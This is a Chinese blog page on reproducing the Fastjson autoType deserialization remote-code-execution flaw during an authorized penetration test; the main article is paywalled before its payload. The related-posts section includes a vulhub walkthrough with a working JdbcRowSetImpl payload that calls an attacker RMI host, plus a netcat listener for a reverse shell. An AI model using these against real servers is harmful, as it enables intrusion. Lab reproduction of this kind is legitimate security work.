Fastjson反序列化漏洞复现(实战案例)

已于 2022-04-19 17:29:12 修改
阅读量1.8w 收藏 84
点赞数 13
文章标签: web安全 渗透测试 安全
于 2022-04-19 15:50:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jinzezhi/article/details/124274123
版权

漏洞介绍

FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。

前言

以下为有授权测试,未经授权,千万不要触碰法律。

拿到项目后找到了一个后台登录的页面,然后尝试弱口令(yyds)无果

抓包尝试是否存在注入,这里看到是json请求,就尝试去构造或者破坏原有的json请求,从返回的数据包中可以看到有fastjson字样,如果没有报错回显,就使用dnslog进行验证(后面会说到)。

尝试是否存在fastjson反序列化漏洞,构造以下payload看到了版本信息&#x

最低0.47元/天 解锁文章
@A1
关注
  • 13
    点赞
  • 84
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4533
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
Fastjson反序列化漏洞复现分析
include_voidmain的博客
03-25 5483
0x01 反序列化过程 fastjson将字符串转换为对象的方法主要有parse和parseObject 其中parseObject也会调用parse来解析json,下面来分析下反序列化过程 首先写一个测试的javabean public class TestBean { public String isMessage; public String message; public int id; public String getMessage() { System.out.println("getMess
FastjsonScan 使用教程
最新发布
gitblog_00819的博客
08-08 767
FastjsonScan 使用教程 FastjsonScan一个简单的Fastjson反序列化检测burp插件项目地址:https://gitcode.com/gh_mirrors/fas/FastjsonScan 项目介绍 FastjsonScan 是一个用于检测和利用 Fastjson JSON 解析器漏洞的工具。Fastjson 是一个在 Java 生态中广泛使用的 JSON 处理库,但由...
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3402
Fastjson 1.2.47反序列化漏洞复现
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6365
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
FastJson反序列化漏洞复现
小赵同学的博客
07-29 3966
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2209
Fastjson反序列化漏洞复现
复现fastjson反序化漏洞(fastjson≤1.2.80)
TVT111的博客
07-21 2929
文章利用JNDI-Injection-Exploit工具,主要讲解如何利用JNDI注入复现fastjson反序化漏洞
fastjson反序列化漏洞复现
weixin_43225966的博客
04-23 934
fastjson 反序列化漏洞复现
FastJson反序列化漏洞复现附带多个版本的payload
qq_41187177的博客
09-03 4299
FastJson<=1.2.68版本反序列化漏洞复现1.漏洞环境搭建2.攻击环境搭建3.攻击步骤4.各个Fastjson版本的payload3.漏洞解析 1.漏洞环境搭建 打开IDEA,新建一个java web的项目 修改HelloServlet.java文件输入一下代码import java.io.*; import javax.servlet.http.*; import javax.servlet.annotation.*; import com.alibaba.fastjson.*; @W
fastjson反序列化漏洞复现
weixin_58954236的博客
09-11 1341
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
Fastjson <= 1.2.47 反序列化漏洞复现
qq_32660043的博客
08-23 439
0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习 0x03 环境准备 docker 搜索 Fastjson 漏洞利用镜像: docker search fas
FastJson 漏洞复现
来日可期的博客
09-11 2479
FastJson 1.2.24 反序列化导致任意命令执行漏洞Fastjson 1.2.47 远程命令执行漏洞
Fastjson历史漏洞复现
懂进攻知防守
07-27 1432
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...
【网络安全Fastjson反序列化漏洞复现
kali_Ma的博客
12-26 2707
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
HEAVEN569的博客
06-21 1647
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
fastjson反序列化漏洞复现vulhub
06-01
好的,这是一个比较常见的漏洞,以下是vulhub上的fastjson反序列化漏洞复现步骤: 1. 下载并启动vulhub: ``` git clone https://github.com/vulhub/vulhub.git cd vulhub/fastjson/1.2.24_rce/ docker-compose up -d ``` 2. 打开浏览器,访问`http://your-ip:8080/`,可以看到一个输入框和一个提交按钮。 3. 在输入框中输入以下内容: ``` {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your-ip:1099/Exploit","autoCommit":true} ``` 其中,`your-ip`需要替换为你自己的IP地址。 4. 点击提交按钮,可以看到出现了一个弹窗,表示攻击成功。 5. 在vulhub所在的机器上执行以下命令: ``` nc -lvnp 4444 ``` 6. 在攻击成功的弹窗中,点击“确认”按钮,即可成功得到一个反弹shell。 以上就是漏洞复现步骤,需要注意的是,该漏洞具有很大的危害性,攻击者可以通过该漏洞实现远程命令执行,因此需要及时修复。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值